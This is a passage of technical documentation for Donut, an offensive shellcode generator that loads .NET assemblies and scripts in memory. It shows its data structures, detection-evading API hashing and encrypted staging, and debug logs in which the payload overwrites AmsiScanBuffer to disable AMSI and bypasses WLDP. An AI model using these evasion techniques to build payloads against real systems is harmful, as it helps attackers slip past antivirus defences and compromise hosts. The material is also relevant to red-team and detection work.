158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
277 <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
